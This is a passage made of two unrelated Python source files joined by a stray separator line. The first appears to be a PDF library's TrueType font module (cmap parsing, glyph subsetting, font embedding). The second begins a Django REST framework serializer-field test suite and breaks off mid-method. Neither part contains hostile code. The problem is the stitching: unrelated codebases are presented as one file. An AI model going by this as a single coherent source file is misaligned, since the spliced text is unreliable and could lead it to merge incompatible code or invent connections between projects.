        for n in xrange(cmapTableCount):
            platformID = self.read_ushort()
            encodingID = self.read_ushort()
            offset = self.read_ulong()
            if platformID == 3 and encodingID == 1: # Microsoft, Unicode
                format = self.get_ushort(cmap_offset + offset)
                if format == 4:
                    unicode_cmap_offset = cmap_offset + offset
                    break
            elif platformID == 0: # Unicode -- assume all encodings are compatible
                format = self.get_ushort(cmap_offset + offset)
                if format == 4:
                    unicode_cmap_offset = cmap_offset + offset
                    break
        if unicode_cmap_offset is None:
            raise TTFError, 'Font does not have cmap for Unicode (platform 3, encoding 1, format 4 or platform 0 any encoding format 4)'
        self.seek(unicode_cmap_offset + 2)
        length = self.read_ushort()
        limit = unicode_cmap_offset + length
        self.skip(2)
        # Format 4 stores segCountX2.
        segCount = int(self.read_ushort() / 2.0)
        self.skip(6)
        endCount = map(lambda x, self=self: self.read_ushort(), xrange(segCount))
        self.skip(2)
        startCount = map(lambda x, self=self: self.read_ushort(), xrange(segCount))
        idDelta = map(lambda x, self=self: self.read_short(), xrange(segCount))
        idRangeOffset_start = self._pos
        idRangeOffset = map(lambda x, self=self: self.read_ushort(), xrange(segCount))
        # Now it gets tricky: resolve each segment's character range to glyph
        # ids, either via the delta shortcut or the glyphIdArray indirection.
        glyphToChar = {}
        charToGlyph = {}
        for n in xrange(segCount):
            for unichar in xrange(startCount[n], endCount[n] + 1):
                if idRangeOffset[n] == 0:
                    glyph = (unichar + idDelta[n]) & 0xFFFF
                else:
                    offset = (unichar - startCount[n]) * 2 + idRangeOffset[n]
                    offset = idRangeOffset_start + 2 * n + offset
                    if offset >= limit:
                        # workaround for broken fonts (like Thryomanes)
                        glyph = 0
                    else:
                        glyph = self.get_ushort(offset)
                        if glyph != 0:
                            glyph = (glyph + idDelta[n]) & 0xFFFF
                charToGlyph[unichar] = glyph
                if glyph in glyphToChar:
                    glyphToChar[glyph].append(unichar)
                else:
                    glyphToChar[glyph] = [unichar]
        self.charToGlyph = charToGlyph
        # hmtx - Horizontal metrics table
        # (needs data from hhea, maxp, and cmap tables)
        self.seek_table("hmtx")
        aw = None
        self.charWidths = {}
        self.hmetrics = []
        for glyph in xrange(numberOfHMetrics):
            # advance width and left side bearing. lsb is actually signed
            # short, but we don't need it anyway (except for subsetting)
            aw, lsb = self.read_ushort(), self.read_ushort()
            self.hmetrics.append((aw, lsb))
            aw = scale(aw)
            if glyph == 0:
                # Glyph 0 (.notdef) supplies the default width.
                self.defaultWidth = aw
            if glyph in glyphToChar:
                for char in glyphToChar[glyph]:
                    self.charWidths[char] = aw
        for glyph in xrange(numberOfHMetrics, numGlyphs):
            # the rest of the table only lists advance left side bearings.
            # so we reuse aw set by the last iteration of the previous loop
            lsb = self.read_ushort()
            self.hmetrics.append((aw, lsb))
            if glyph in glyphToChar:
                for char in glyphToChar[glyph]:
                    self.charWidths[char] = aw
        # loca - Index to location
        self.seek_table('loca')
        self.glyphPos = []
        if indexToLocFormat == 0:
            # Short format stores offset/2.
            for n in xrange(numGlyphs + 1):
                self.glyphPos.append(self.read_ushort() << 1)
        elif indexToLocFormat == 1:
            for n in xrange(numGlyphs + 1):
                self.glyphPos.append(self.read_ulong())
        else:
            raise TTFError, 'Unknown location table format (%d)' % indexToLocFormat
# Subsetting
def makeSubset(self, subset):
    """Create a subset of a TrueType font.

    subset -- iterable of unicode code points to include.
    Returns the binary contents of the subsetted font file (a string),
    as produced by TTFontMaker.makeStream().
    """
    output = TTFontMaker()
    # Build a mapping of glyphs in the subset to glyph numbers in
    # the original font. Also build a mapping of UCS codes to
    # glyph values in the new font.
    # Start with 0 -> 0: "missing character"
    glyphMap = [0]      # new glyph index -> old glyph index
    glyphSet = {0: 0}   # old glyph index -> new glyph index
    codeToGlyph = {}    # unicode -> new glyph index
    for code in subset:
        if code in self.charToGlyph:
            originalGlyphIdx = self.charToGlyph[code]
        else:
            # Unmapped characters fall back to glyph 0 (".notdef").
            originalGlyphIdx = 0
        if originalGlyphIdx not in glyphSet:
            glyphSet[originalGlyphIdx] = len(glyphMap)
            glyphMap.append(originalGlyphIdx)
        codeToGlyph[code] = glyphSet[originalGlyphIdx]
    # Also include glyphs that are parts of composite glyphs.
    # Note: glyphMap may grow while we scan it, so newly discovered
    # components are themselves scanned for further components.
    start = self.get_table_pos('glyf')[0]
    n = 0
    while n < len(glyphMap):
        originalGlyphIdx = glyphMap[n]
        glyphPos = self.glyphPos[originalGlyphIdx]
        glyphLen = self.glyphPos[originalGlyphIdx + 1] - glyphPos
        n += 1
        if not glyphLen: continue
        self.seek(start + glyphPos)
        numberOfContours = self.read_short()
        if numberOfContours < 0:
            # composite glyph: walk the component records, pulling every
            # referenced glyph index into the subset
            self.skip(8)
            flags = GF_MORE_COMPONENTS
            while flags & GF_MORE_COMPONENTS:
                flags = self.read_ushort()
                glyphIdx = self.read_ushort()
                if glyphIdx not in glyphSet:
                    glyphSet[glyphIdx] = len(glyphMap)
                    glyphMap.append(glyphIdx)
                # Skip the component arguments and transform, whose sizes
                # depend on the flag bits.
                if flags & GF_ARG_1_AND_2_ARE_WORDS:
                    self.skip(4)
                else:
                    self.skip(2)
                if flags & GF_WE_HAVE_A_SCALE:
                    self.skip(2)
                elif flags & GF_WE_HAVE_AN_X_AND_Y_SCALE:
                    self.skip(4)
                elif flags & GF_WE_HAVE_A_TWO_BY_TWO:
                    self.skip(8)
    numGlyphs = n = len(glyphMap)
    # Trim trailing glyphs that repeat the same advance width; hmtx allows
    # the final advance to be implied for the remaining glyphs.
    while n > 1 and self.hmetrics[n][0] == self.hmetrics[n - 1][0]:
        n -= 1
    numberOfHMetrics = n
    # The following tables are simply copied from the original
    for tag in ('name', 'OS/2', 'cvt ', 'fpgm', 'prep'):
        try:
            output.add(tag, self.get_table(tag))
        except KeyError:
            # Apparently some of the tables are optional (cvt, fpgm, prep).
            # The lack of the required ones (name, OS/2) would have already
            # been caught before.
            pass
    # post - PostScript: force version 3.0 (no glyph names stored)
    post = "\x00\x03\x00\x00" + self.get_table('post')[4:16] + "\x00" * 16
    output.add('post', post)
    # hhea - Horizontal Header: patch the numberOfHMetrics field
    hhea = self.get_table('hhea')
    hhea = _set_ushort(hhea, 34, numberOfHMetrics)
    output.add('hhea', hhea)
    # maxp - Maximum Profile: patch the numGlyphs field
    maxp = self.get_table('maxp')
    maxp = _set_ushort(maxp, 4, numGlyphs)
    output.add('maxp', maxp)
    # cmap - Character to glyph mapping
    # XXX maybe use format 0 if possible, not 6?
    entryCount = len(subset)
    length = 10 + entryCount * 2
    cmap = [0, 1,           # version, number of tables
            1, 0, 0, 12,    # platform, encoding, offset (hi,lo)
            6, length, 0,   # format, length, language
            0,
            entryCount] + \
           map(codeToGlyph.get, subset)
    cmap = pack(*([">%dH" % len(cmap)] + cmap))
    output.add('cmap', cmap)
    # hmtx - Horizontal Metrics: full (aw, lsb) pairs up to
    # numberOfHMetrics, then lsb-only entries for the rest
    hmtx = []
    for n in xrange(numGlyphs):
        originalGlyphIdx = glyphMap[n]
        aw, lsb = self.hmetrics[originalGlyphIdx]
        if n < numberOfHMetrics:
            hmtx.append(int(aw))
        hmtx.append(int(lsb))
    hmtx = pack(*([">%dH" % len(hmtx)] + hmtx))
    output.add('hmtx', hmtx)
    # glyf - Glyph data
    glyphData = self.get_table('glyf')
    offsets = []
    glyf = []
    pos = 0
    for n in xrange(numGlyphs):
        offsets.append(pos)
        originalGlyphIdx = glyphMap[n]
        glyphPos = self.glyphPos[originalGlyphIdx]
        glyphLen = self.glyphPos[originalGlyphIdx + 1] - glyphPos
        data = glyphData[glyphPos:glyphPos + glyphLen]
        # Fix references in composite glyphs: component glyph indices must
        # be rewritten from old font numbering to the new subset numbering.
        if glyphLen > 2 and unpack(">h", data[:2])[0] < 0:
            # composite glyph
            pos_in_glyph = 10
            flags = GF_MORE_COMPONENTS
            while flags & GF_MORE_COMPONENTS:
                flags = unpack(">H", data[pos_in_glyph:pos_in_glyph + 2])[0]
                glyphIdx = unpack(">H", data[pos_in_glyph + 2:pos_in_glyph + 4])[0]
                data = _set_ushort(data, pos_in_glyph + 2, glyphSet[glyphIdx])
                pos_in_glyph = pos_in_glyph + 4
                if flags & GF_ARG_1_AND_2_ARE_WORDS:
                    pos_in_glyph = pos_in_glyph + 4
                else:
                    pos_in_glyph = pos_in_glyph + 2
                if flags & GF_WE_HAVE_A_SCALE:
                    pos_in_glyph = pos_in_glyph + 2
                elif flags & GF_WE_HAVE_AN_X_AND_Y_SCALE:
                    pos_in_glyph = pos_in_glyph + 4
                elif flags & GF_WE_HAVE_A_TWO_BY_TWO:
                    pos_in_glyph = pos_in_glyph + 8
        glyf.append(data)
        pos = pos + glyphLen
        # Keep every glyph 4-byte aligned (also keeps offsets even, which
        # the short 'loca' format requires).
        if pos % 4 != 0:
            padding = 4 - pos % 4
            glyf.append('\0' * padding)
            pos = pos + padding
    offsets.append(pos)
    output.add('glyf', string.join(glyf, ""))
    # loca - Index to location: short format stores offset/2 in ushorts,
    # long format stores the raw offset in ulongs.
    loca = []
    if (pos + 1) >> 1 > 0xFFFF:
        indexToLocFormat = 1        # long format
        for offset in offsets:
            loca.append(offset)
        loca = pack(*([">%dL" % len(loca)] + loca))
    else:
        indexToLocFormat = 0        # short format
        for offset in offsets:
            loca.append(offset >> 1)
        loca = pack(*([">%dH" % len(loca)] + loca))
    output.add('loca', loca)
    # head - Font header: patch indexToLocFormat to match what we emitted
    head = self.get_table('head')
    head = _set_ushort(head, 50, indexToLocFormat)
    output.add('head', head)
    return output.makeStream()
#
# TrueType font embedding
#

# PDF font flags (see PDF Reference Guide table 5.19).
# The spec numbers flag bits starting at 1, hence the `1 << n-1` pattern:
# each constant sets PDF flag bit n.
FF_FIXED = 1 << 1-1         # bit 1:  FixedPitch
FF_SERIF = 1 << 2-1         # bit 2:  Serif
FF_SYMBOLIC = 1 << 3-1      # bit 3:  Symbolic
FF_SCRIPT = 1 << 4-1        # bit 4:  Script
FF_NONSYMBOLIC = 1 << 6-1   # bit 6:  Nonsymbolic
FF_ITALIC = 1 << 7-1        # bit 7:  Italic
FF_ALLCAP = 1 << 17-1       # bit 17: AllCap
FF_SMALLCAP = 1 << 18-1     # bit 18: SmallCap
FF_FORCEBOLD = 1 << 19-1    # bit 19: ForceBold
class TTFontFace(TTFontFile, pdfmetrics.TypeFace):
    """TrueType typeface.

    Conceptually similar to a single byte typeface, but the glyphs are
    identified by UCS character codes instead of glyph names."""

    def __init__(self, filename, validate=0, subfontIndex=0):
        "Loads a TrueType font from filename."
        # Initialise the TypeFace side first, then parse the font file.
        pdfmetrics.TypeFace.__init__(self, None)
        TTFontFile.__init__(self, filename, validate=validate, subfontIndex=subfontIndex)

    def getCharWidth(self, code):
        "Returns the width of character U+<code>"
        try:
            return self.charWidths[code]
        except KeyError:
            return self.defaultWidth

    def addSubsetObjects(self, doc, fontname, subset):
        """Generate a TrueType font subset and add it to the PDF document.
        Returns a PDFReference to the new FontDescriptor object."""
        stream = pdfdoc.PDFStream()
        stream.content = self.makeSubset(subset)
        stream.dictionary['Length1'] = len(stream.content)
        if doc.compression:
            stream.filters = [pdfdoc.PDFZCompress]
        streamRef = doc.Reference(stream, 'fontFile:%s(%s)' % (self.filename, fontname))
        # Glyphs are addressed by code, not by standard names, so the
        # descriptor must advertise a symbolic font.
        descriptorFlags = (self.flags & ~ FF_NONSYMBOLIC) | FF_SYMBOLIC
        descriptor = pdfdoc.PDFDictionary({
            'Type': '/FontDescriptor',
            'Ascent': self.ascent,
            'CapHeight': self.capHeight,
            'Descent': self.descent,
            'Flags': descriptorFlags,
            'FontBBox': pdfdoc.PDFArray(self.bbox),
            'FontName': pdfdoc.PDFName(fontname),
            'ItalicAngle': self.italicAngle,
            'StemV': self.stemV,
            'FontFile2': streamRef,
            })
        return doc.Reference(descriptor, 'fontDescriptor:' + fontname)
class TTEncoding:
    """Encoding for TrueType fonts (always UTF-8).

    TTEncoding does not directly participate in PDF object creation, since
    we need a number of different 8-bit encodings for every generated font
    subset.  TTFont itself cares about that."""

    def __init__(self):
        # Fixed: dynamic TrueType fonts always take UTF-8 input.
        self.name = "UTF-8"
class TTFont:
    """Represents a TrueType font.

    Its encoding is always UTF-8.

    Note: you cannot use the same TTFont object for different documents
    at the same time.

    Example of usage:

        font = ttfonts.TTFont('PostScriptFontName', '/path/to/font.ttf')
        pdfmetrics.registerFont(font)

        canvas.setFont('PostScriptFontName', size)
        canvas.drawString(x, y, "Some text encoded in UTF-8")
    """

    class State:
        # Per-document subsetting state: which unicode chars have been seen
        # and which (subset, code) slot each one occupies.
        namePrefix = 'F'

        def __init__(self, asciiReadable=None):
            self.assignments = {}       # unicode char -> packed (subset<<8 | code)
            self.nextCode = 0           # next free packed code
            self.internalName = None    # PDF-internal font name, assigned lazily
            self.frozen = 0             # once 1, no new characters may be added
            if asciiReadable is None:
                asciiReadable = rl_config.ttfAsciiReadable
            if asciiReadable:
                # Let's add the first 128 unicodes to the 0th subset, so ' '
                # always has code 32 (for word spacing to work) and the ASCII
                # output is readable
                subset0 = range(128)
                self.subsets = [subset0]
                for n in subset0:
                    self.assignments[n] = n
                self.nextCode = 128
            else:
                # Non-readable mode: prefill subset 0 so that code 32 is a
                # space; low slots get overwritten as characters arrive.
                self.subsets = [[32]*33]
                self.assignments[32] = 32

    _multiByte = 1      # We want our own stringwidth
    _dynamicFont = 1    # We want dynamic subsetting

    def __init__(self, name, filename, validate=0, subfontIndex=0, asciiReadable=None):
        """Loads a TrueType font from filename.

        If validate is set to a false values, skips checksum validation.  This
        can save time, especially if the font is large.
        """
        self.fontName = name
        self.face = TTFontFace(filename, validate=validate, subfontIndex=subfontIndex)
        self.encoding = TTEncoding()
        from weakref import WeakKeyDictionary
        # Weak keys: dropping the document releases its subsetting state.
        self.state = WeakKeyDictionary()
        if asciiReadable is None:
            asciiReadable = rl_config.ttfAsciiReadable
        self._asciiReadable = asciiReadable

    def _py_stringWidth(self, text, size, encoding='utf-8'):
        "Calculate text width"
        if not isinstance(text, unicode):
            text = unicode(text, encoding or 'utf-8')   # encoding defaults to utf-8
        g = self.face.charWidths.get
        dw = self.face.defaultWidth
        return 0.001*size*sum([g(ord(u), dw) for u in text])
    stringWidth = _py_stringWidth   # may be replaced by the C accelerator below

    def _assignState(self, doc, asciiReadable=None, namePrefix=None):
        '''convenience function for those wishing to roll their own state properties'''
        if asciiReadable is None:
            asciiReadable = self._asciiReadable
        try:
            state = self.state[doc]
        except KeyError:
            state = self.state[doc] = TTFont.State(asciiReadable)
            if namePrefix is not None:
                state.namePrefix = namePrefix
        return state

    def splitString(self, text, doc, encoding='utf-8'):
        """Splits text into a number of chunks, each of which belongs to a
        single subset.  Returns a list of tuples (subset, string).  Use subset
        numbers with getSubsetInternalName.  Doc is needed for distinguishing
        subsets when building different documents at the same time."""
        asciiReadable = self._asciiReadable
        try: state = self.state[doc]
        except KeyError: state = self.state[doc] = TTFont.State(asciiReadable)
        curSet = -1
        cur = []
        results = []
        if not isinstance(text, unicode):
            text = unicode(text, encoding or 'utf-8')   # encoding defaults to utf-8
        assignments = state.assignments
        subsets = state.subsets
        for code in map(ord, text):
            if code in assignments:
                n = assignments[code]
            else:
                # Assign a new packed code: high byte is the subset number,
                # low byte the 8-bit code within that subset.
                if state.frozen:
                    raise pdfdoc.PDFError, "Font %s is already frozen, cannot add new character U+%04X" % (self.fontName, code)
                n = state.nextCode
                if n&0xFF==32:
                    # make code 32 always be a space character
                    if n!=32: subsets[n >> 8].append(32)
                    state.nextCode += 1
                    n = state.nextCode
                state.nextCode += 1
                assignments[code] = n
                if n>32:
                    # Starting a new 256-char subset when the low byte wraps.
                    if not(n&0xFF): subsets.append([])
                    subsets[n >> 8].append(code)
                else:
                    # Low slots overwrite the prefilled entries of subset 0.
                    subsets[0][n] = code
            if (n >> 8) != curSet:
                # Subset changed: flush the current chunk.
                if cur:
                    results.append((curSet, ''.join(map(chr, cur))))
                curSet = (n >> 8)
                cur = []
            cur.append(n & 0xFF)
        if cur:
            results.append((curSet, ''.join(map(chr, cur))))
        return results

    def getSubsetInternalName(self, subset, doc):
        """Returns the name of a PDF Font object corresponding to a given
        subset of this dynamic font.  Use this function instead of
        PDFDocument.getInternalFontName."""
        try: state = self.state[doc]
        except KeyError: state = self.state[doc] = TTFont.State(self._asciiReadable)
        if subset < 0 or subset >= len(state.subsets):
            raise IndexError, 'Subset %d does not exist in font %s' % (subset, self.fontName)
        if state.internalName is None:
            # First use in this document: register the font for delayed
            # object creation in addObjects().
            state.internalName = state.namePrefix + repr(len(doc.fontMapping) + 1)
            doc.fontMapping[self.fontName] = '/' + state.internalName
            doc.delayedFonts.append(self)
        return '/%s+%d' % (state.internalName, subset)

    def addObjects(self, doc):
        """Makes one or more PDF objects to be added to the document.  The
        caller supplies the internal name to be used (typically F1, F2, ... in
        sequence).

        This method creates a number of Font and FontDescriptor objects.  Every
        FontDescriptor is a (no more than) 256 character subset of the original
        TrueType font."""
        try: state = self.state[doc]
        except KeyError: state = self.state[doc] = TTFont.State(self._asciiReadable)
        # Freeze: no new characters may be assigned after objects are built.
        state.frozen = 1
        for n, subset in enumerate(state.subsets):
            internalName = self.getSubsetInternalName(n, doc)[1:]
            baseFontName = "%s+%s%s" % (SUBSETN(n), self.face.name, self.face.subfontNameX)

            pdfFont = pdfdoc.PDFTrueTypeFont()
            pdfFont.__Comment__ = 'Font %s subset %d' % (self.fontName, n)
            pdfFont.Name = internalName
            pdfFont.BaseFont = baseFontName
            pdfFont.FirstChar = 0
            pdfFont.LastChar = len(subset) - 1
            widths = map(self.face.getCharWidth, subset)
            pdfFont.Widths = pdfdoc.PDFArray(widths)
            cmapStream = pdfdoc.PDFStream()
            cmapStream.content = makeToUnicodeCMap(baseFontName, subset)
            if doc.compression:
                cmapStream.filters = [pdfdoc.PDFZCompress]
            pdfFont.ToUnicode = doc.Reference(cmapStream, 'toUnicodeCMap:' + baseFontName)
            pdfFont.FontDescriptor = self.face.addSubsetObjects(doc, baseFontName, subset)
            # link it in
            ref = doc.Reference(pdfFont, internalName)
            fontDict = doc.idToObject['BasicFonts'].dict
            fontDict[internalName] = pdfFont
        # Per-document state is complete; discard it.
        del self.state[doc]
# Optional C accelerator: when the _rl_accel extension is importable,
# replace the pure-Python stringWidth with the C implementation, bound as
# an unbound instance method via the Python-2 `new` module.
try:
    from _rl_accel import _instanceStringWidthTTF
    import new
    TTFont.stringWidth = new.instancemethod(_instanceStringWidthTTF, None, TTFont)
except ImportError:
    # No accelerator available; keep _py_stringWidth.
    pass
| |
from decimal import Decimal
from django.utils import timezone
from rest_framework import serializers
import rest_framework
import datetime
import django
import pytest
import uuid
# Tests for field keyword arguments and core functionality.
# ---------------------------------------------------------
class TestEmpty:
    """
    Tests for `required`, `allow_null`, `allow_blank`, `default`.
    """
    def test_required(self):
        """
        By default a field must be included in the input.
        """
        field = serializers.IntegerField()
        with pytest.raises(serializers.ValidationError) as exc_info:
            field.run_validation()
        assert exc_info.value.detail == ['This field is required.']

    def test_not_required(self):
        """
        If `required=False` then a field may be omitted from the input.
        """
        field = serializers.IntegerField(required=False)
        with pytest.raises(serializers.SkipField):
            field.run_validation()

    def test_disallow_null(self):
        """
        By default `None` is not a valid input.
        """
        field = serializers.IntegerField()
        with pytest.raises(serializers.ValidationError) as exc_info:
            field.run_validation(None)
        assert exc_info.value.detail == ['This field may not be null.']

    def test_allow_null(self):
        """
        If `allow_null=True` then `None` is a valid input.
        """
        field = serializers.IntegerField(allow_null=True)
        output = field.run_validation(None)
        assert output is None

    def test_disallow_blank(self):
        """
        By default '' is not a valid input.
        """
        field = serializers.CharField()
        with pytest.raises(serializers.ValidationError) as exc_info:
            field.run_validation('')
        assert exc_info.value.detail == ['This field may not be blank.']

    def test_allow_blank(self):
        """
        If `allow_blank=True` then '' is a valid input.
        """
        field = serializers.CharField(allow_blank=True)
        output = field.run_validation('')
        assert output == ''

    def test_default(self):
        """
        If `default` is set, then omitted values get the default input.
        """
        field = serializers.IntegerField(default=123)
        output = field.run_validation()
        # Compare by equality, not identity: `output is 123` only passed
        # because CPython interns small integers, which is an implementation
        # detail rather than guaranteed behavior.
        assert output == 123
class TestSource:
    def test_source(self):
        """A field with `source` validates into the source key."""
        class ExampleSerializer(serializers.Serializer):
            example_field = serializers.CharField(source='other')

        ser = ExampleSerializer(data={'example_field': 'abc'})
        assert ser.is_valid()
        assert ser.validated_data == {'other': 'abc'}

    def test_redundant_source(self):
        """`source` equal to the field name is rejected with a clear message."""
        class ExampleSerializer(serializers.Serializer):
            example_field = serializers.CharField(source='example_field')

        with pytest.raises(AssertionError) as exc_info:
            ExampleSerializer().fields
        expected = (
            "It is redundant to specify `source='example_field'` on field "
            "'CharField' in serializer 'ExampleSerializer', because it is the "
            "same as the field name. Remove the `source` keyword argument."
        )
        assert str(exc_info.value) == expected

    def test_callable_source(self):
        """A `source` naming a method serializes its return value."""
        class ExampleInstance(object):
            def example_callable(self):
                return 'example callable value'

        class ExampleSerializer(serializers.Serializer):
            example_field = serializers.CharField(source='example_callable')

        ser = ExampleSerializer(ExampleInstance())
        assert ser.data['example_field'] == 'example callable value'

    def test_callable_source_raises(self):
        """Errors raised inside a callable source propagate usefully."""
        class ExampleInstance(object):
            def example_callable(self):
                raise AttributeError('method call failed')

        class ExampleSerializer(serializers.Serializer):
            example_field = serializers.CharField(source='example_callable', read_only=True)

        with pytest.raises(ValueError) as exc_info:
            ser = ExampleSerializer(ExampleInstance())
            ser.data.items()
        assert 'method call failed' in str(exc_info.value)
class TestReadOnly:
    def setup(self):
        class ExampleSerializer(serializers.Serializer):
            read_only = serializers.ReadOnlyField()
            writable = serializers.IntegerField()

        self.Serializer = ExampleSerializer

    def test_validate_read_only(self):
        """
        Read-only fields should not be included in validation.
        """
        ser = self.Serializer(data={'read_only': 123, 'writable': 456})
        assert ser.is_valid()
        assert ser.validated_data == {'writable': 456}

    def test_serialize_read_only(self):
        """
        Read-only fields should be serialized.
        """
        ser = self.Serializer({'read_only': 123, 'writable': 456})
        assert ser.data == {'read_only': 123, 'writable': 456}
class TestWriteOnly:
    def setup(self):
        class ExampleSerializer(serializers.Serializer):
            write_only = serializers.IntegerField(write_only=True)
            readable = serializers.IntegerField()

        self.Serializer = ExampleSerializer

    def test_validate_write_only(self):
        """
        Write-only fields should be included in validation.
        """
        ser = self.Serializer(data={'write_only': 123, 'readable': 456})
        assert ser.is_valid()
        assert ser.validated_data == {'write_only': 123, 'readable': 456}

    def test_serialize_write_only(self):
        """
        Write-only fields should not be serialized.
        """
        ser = self.Serializer({'write_only': 123, 'readable': 456})
        assert ser.data == {'readable': 456}
class TestInitial:
    def setup(self):
        class ExampleSerializer(serializers.Serializer):
            initial_field = serializers.IntegerField(initial=123)
            blank_field = serializers.IntegerField()

        self.serializer = ExampleSerializer()

    def test_initial(self):
        """
        Initial values should be included when serializing a new representation.
        """
        expected = {'initial_field': 123, 'blank_field': None}
        assert self.serializer.data == expected
class TestLabel:
    def setup(self):
        class ExampleSerializer(serializers.Serializer):
            labeled = serializers.IntegerField(label='My label')

        self.serializer = ExampleSerializer()

    def test_label(self):
        """
        A field's label may be set with the `label` argument.
        """
        assert self.serializer.fields['labeled'].label == 'My label'
class TestInvalidErrorKey:
    def setup(self):
        # NB: the class name `ExampleField` appears in the expected error
        # message below, so it must not be renamed.
        class ExampleField(serializers.Field):
            def to_native(self, data):
                self.fail('incorrect')

        self.field = ExampleField()

    def test_invalid_error_key(self):
        """
        If a field raises a validation error, but does not have a corresponding
        error message, then raise an appropriate assertion error.
        """
        with pytest.raises(AssertionError) as exc_info:
            self.field.to_native(123)
        assert str(exc_info.value) == (
            'ValidationError raised by `ExampleField`, but error key '
            '`incorrect` does not exist in the `error_messages` dictionary.'
        )
class MockHTMLDict(dict):
    """
    This class mocks up a dictionary like object, that behaves
    as if it was returned for multipart or urlencoded data.
    """
    # Presumably the mere presence of a `getlist` attribute (as on Django's
    # QueryDict) is what makes serializers treat this as HTML form input —
    # TODO confirm against the fields implementation.
    getlist = None
class TestBooleanHTMLInput:
    def setup(self):
        class ExampleSerializer(serializers.Serializer):
            archived = serializers.BooleanField()

        self.Serializer = ExampleSerializer

    def test_empty_html_checkbox(self):
        """
        HTML checkboxes do not send any value, but should be treated
        as `False` by BooleanField.
        """
        # MockHTMLDict stands in for multipart/urlencoded form data, where
        # an unchecked checkbox is simply absent from the payload.
        ser = self.Serializer(data=MockHTMLDict())
        assert ser.is_valid()
        assert ser.validated_data == {'archived': False}
class TestHTMLInput:
    """How omitted or blank values in HTML form data interact with
    `default`, `allow_null`, `allow_blank` and `required=False`."""

    def test_empty_html_charfield(self):
        """An omitted form value falls back to the field's `default`."""
        class TestSerializer(serializers.Serializer):
            message = serializers.CharField(default='happy')

        serializer = TestSerializer(data=MockHTMLDict())
        assert serializer.is_valid()
        assert serializer.validated_data == {'message': 'happy'}

    def test_empty_html_charfield_allow_null(self):
        """A blank form value validates to None when `allow_null=True`."""
        class TestSerializer(serializers.Serializer):
            message = serializers.CharField(allow_null=True)

        serializer = TestSerializer(data=MockHTMLDict({'message': ''}))
        assert serializer.is_valid()
        assert serializer.validated_data == {'message': None}

    def test_empty_html_datefield_allow_null(self):
        """Same blank-to-None coercion applies to non-char fields."""
        class TestSerializer(serializers.Serializer):
            expiry = serializers.DateField(allow_null=True)

        serializer = TestSerializer(data=MockHTMLDict({'expiry': ''}))
        assert serializer.is_valid()
        assert serializer.validated_data == {'expiry': None}

    def test_empty_html_charfield_allow_null_allow_blank(self):
        """With both flags set, the blank string wins over None."""
        class TestSerializer(serializers.Serializer):
            message = serializers.CharField(allow_null=True, allow_blank=True)

        serializer = TestSerializer(data=MockHTMLDict({'message': ''}))
        assert serializer.is_valid()
        assert serializer.validated_data == {'message': ''}

    def test_empty_html_charfield_required_false(self):
        """An omitted value is simply skipped when `required=False`."""
        class TestSerializer(serializers.Serializer):
            message = serializers.CharField(required=False)

        serializer = TestSerializer(data=MockHTMLDict())
        assert serializer.is_valid()
        assert serializer.validated_data == {}
class TestCreateOnlyDefault:
    """`CreateOnlyDefault` supplies its default on create, but is omitted
    entirely on update (when an instance is passed to the serializer)."""

    def setup(self):
        default = serializers.CreateOnlyDefault('2001-01-01')

        class TestSerializer(serializers.Serializer):
            published = serializers.HiddenField(default=default)
            text = serializers.CharField()

        self.Serializer = TestSerializer

    def test_create_only_default_is_provided(self):
        # No instance -> create: the default is injected.
        serializer = self.Serializer(data={'text': 'example'})
        assert serializer.is_valid()
        assert serializer.validated_data == {
            'text': 'example', 'published': '2001-01-01'
        }

    def test_create_only_default_is_not_provided_on_update(self):
        # Instance present -> update: the default must be absent.
        instance = {
            'text': 'example', 'published': '2001-01-01'
        }
        serializer = self.Serializer(instance, data={'text': 'example'})
        assert serializer.is_valid()
        assert serializer.validated_data == {
            'text': 'example',
        }

    def test_create_only_default_callable_sets_context(self):
        """
        CreateOnlyDefault instances with a callable default should set_context
        on the callable if possible
        """
        class TestCallableDefault:
            def set_context(self, serializer_field):
                self.field = serializer_field

            def __call__(self):
                # Returns 'success' only if set_context ran first.
                return "success" if hasattr(self, 'field') else "failure"

        class TestSerializer(serializers.Serializer):
            context_set = serializers.CharField(default=serializers.CreateOnlyDefault(TestCallableDefault()))

        serializer = TestSerializer(data={})
        assert serializer.is_valid()
        assert serializer.validated_data['context_set'] == 'success'
# Tests for field input and output values.
# ----------------------------------------
def get_items(mapping_or_list_of_two_tuples):
    """Normalize a test-case container to an iterable of (value, expected) pairs.

    Accepts either a dict mapping input value -> expected output, or a
    list of two-tuples (used when inputs are unhashable or repeated).
    """
    pairs = mapping_or_list_of_two_tuples
    return pairs.items() if isinstance(pairs, dict) else pairs
class FieldValues:
    """
    Base class for testing valid and invalid input values.

    Subclasses define `field` plus `valid_inputs`, `invalid_inputs` and
    `outputs` containers (dicts or lists of two-tuples).
    """
    def test_valid_inputs(self):
        """
        Ensure that valid values return the expected validated data.
        """
        for given, expected in get_items(self.valid_inputs):
            assert self.field.run_validation(given) == expected

    def test_invalid_inputs(self):
        """
        Ensure that invalid values raise the expected validation error.
        """
        for given, expected_errors in get_items(self.invalid_inputs):
            with pytest.raises(serializers.ValidationError) as exc_info:
                self.field.run_validation(given)
            assert exc_info.value.detail == expected_errors

    def test_outputs(self):
        """Ensure `to_representation` produces the expected output values."""
        for value, expected in get_items(self.outputs):
            assert self.field.to_representation(value) == expected
# Boolean types...
class TestBooleanField(FieldValues):
    """
    Valid and invalid values for `BooleanField`.
    """
    valid_inputs = {
        'true': True,
        'false': False,
        '1': True,
        '0': False,
        1: True,
        0: False,
        True: True,
        False: False,
    }
    invalid_inputs = {
        'foo': ['"foo" is not a valid boolean.'],
        None: ['This field may not be null.']
    }
    outputs = {
        'true': True,
        'false': False,
        '1': True,
        '0': False,
        1: True,
        0: False,
        True: True,
        False: False,
        # Unrecognised values fall back to plain truthiness on output.
        'other': True
    }
    field = serializers.BooleanField()
class TestNullBooleanField(FieldValues):
    """
    Valid and invalid values for `NullBooleanField`.
    """
    valid_inputs = {
        'true': True,
        'false': False,
        'null': None,
        True: True,
        False: False,
        None: None
    }
    invalid_inputs = {
        'foo': ['"foo" is not a valid boolean.'],
    }
    outputs = {
        'true': True,
        'false': False,
        'null': None,
        True: True,
        False: False,
        None: None,
        # Unrecognised values fall back to plain truthiness on output.
        'other': True
    }
    field = serializers.NullBooleanField()
# String types...
class TestCharField(FieldValues):
    """
    Valid and invalid values for `CharField`.
    """
    valid_inputs = {
        1: '1',
        'abc': 'abc'
    }
    invalid_inputs = {
        '': ['This field may not be blank.']
    }
    outputs = {
        1: '1',
        'abc': 'abc'
    }
    field = serializers.CharField()

    def test_trim_whitespace_default(self):
